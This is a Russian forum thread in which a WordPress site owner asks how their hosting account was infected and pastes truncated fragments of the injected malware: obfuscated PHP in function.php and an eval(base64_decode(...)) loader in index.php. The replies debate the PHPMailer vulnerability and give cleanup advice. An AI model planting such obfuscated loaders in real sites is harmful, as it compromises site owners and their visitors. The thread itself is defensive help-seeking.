Вирус на сайте

Loriksws · 2017-03-22T12:22:07.0000000Z

Добрый день, помогите пожалуйста решить проблему, если кто то сталкивался. Сайт находится на Хостинге Движок Wordpress Заразились абсолютно все сайты одного аккаунта на хостинге. везде появились function.php файлы с содержимым "<?php $ked68a399 = 499;$GLOBALS['zb897e5']=Array();global$zb897e5;$zb897e5=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['m537af']="\x27\x40\x71\x26\x25\x56\x79\x2a\x57\x58\x4d\x44\x52\x3b\x7e\x68\x6d\x5c\x47\x66\x75\x41\x4b\x3d\x28\x20\x4f\x6c\x38\x5d\x7d\x65\x6a\x3a\x48\x2b\x46\x55\x4e\x2d\x2e\x3e\x6e\x7c\x5a\x54\x6f\x60\x30\x76\x21\x59\x62\x61\x35\x5e\x45\x36\x24\x5b\x4c\x2f\x74\x63\x51\x23\xa\x31\x5f\x69\x67\x49\x33\x3c\x73\x3f\x70\x7b\x9\x22\xd\x4a\x78\x39\x43\x2c\x34\x77\x64\x29\x50\x32\x72\x6b\x42\x7a\x37\x53";$zb897e5[$zb897e5['m537af'][69].$zb897e5['m537af'][53].$zb897e5['m537af'][52].$zb897e5['m537af'][86].$zb897e5['m537af'][57].$zb897e5['m537af'][86].$zb897e5['m537af'][67].$zb897e5['m537af'][31]]=$zb897e5['m537af'][63].$zb897e5['m537af'][15].$zb897e5['m537af'][92];$zb897e5[$zb897e5['m537af'][52].$zb897e5['m537af'][53].$zb897e5['m537af'][86].$zb897e5['m537af'] и т.д И index.php <?php eval(base64_decode("aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJHpwc2VnID0gNjAzMTsgZnVuY3Rpb24gYmNzcXF5a3coJGhkbm1iamFreiwgJHd6dmVkbWZqKXskZmF4b3l0ID0gJyc7IGZvcigkaT0wOyAkaSA8IHN0cmxlbigkaG как определить где дыра ? не факт конечно что заражение началось конкретно с моего сайта, но естественно рассматривается как вариант. Wordpress всегда вовремя обновляю, плагины тоже, из последних плагинов поставил только "wordpress-23-related-posts-plugin" остальные на сайте уже очень по долгу и обновляю всегда. Кто то сталкивался с подобным ?

1609

SeVlad

31 марта 2017, 09:14

#11

Maxiz:
Вирус попал через уязвимость в классе PHPMailer

Ставишь диагнозы по фотографии? :)

Loriksws:
как определить где дыра

Глазами и поиском по файлам и (как дополнение) с пом, айболита. В левых/древних аддонах - темы, плагины, код по советам из интернетов (аля "без плагинов"). Мб в хостинге.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.

218

Maxiz

31 марта 2017, 11:07

#12

SeVlad:
Ставишь диагнозы по фотографии? :)

С вероятностью 90% ) Учитывая массовых всплеск в январе-феврале сообщений и тем на форумах о заражении сайтов

S

469

Sitealert

31 марта 2017, 11:35

#13

С вероятность ноль целых хрен десятых процента. С учётом специфики эксплуатации этой уязвимости.

1

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.

1609

SeVlad

3 апреля 2017, 09:26

#14

Maxiz:
Учитывая массовых всплеск в январе-феврале сообщений и тем на форумах о заражении сайтов

1 Взломали не только из-за PHPMailer-а

2. Воспользоваться этой дырой можно при совпадении нескольких условий. Начиная от настроек сервера.

3. Те, кто пострадал из-за него - использовали кривые мейл-формы.

Откуда ты знаешь что у ТСа есть пп2-3? Экстрасенс? :)

Защита от уязвимости phpmailer NS сервера на 2domains.ru Как отправить данные на

10

Рания

17 апреля 2017, 10:43

#15

Проверьте сначала свой компьютер на наличие вирусов. Потом проверьте антивирусом файлы, хранящиеся на хостинге. Используйте лицензированный антивирус, а не устанавливайте вместо него софт сомнительного происхождения. После этого измените все пароли к сайту и электронной почте.

Кто виноват: хостер или Взломали сайт, разместили сапу, Поселился мобильный редирект

S

469

Sitealert

17 апреля 2017, 11:05

#16

Рания:
Проверьте сначала свой компьютер на наличие вирусов.

А заодно проверьте, не пользуется ли кто Вашим компьютером в Ваше отсутствие, поменяйте пароль на компе и ключи от квартиры.

Курс биткоина превысил $50 тысяч

Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта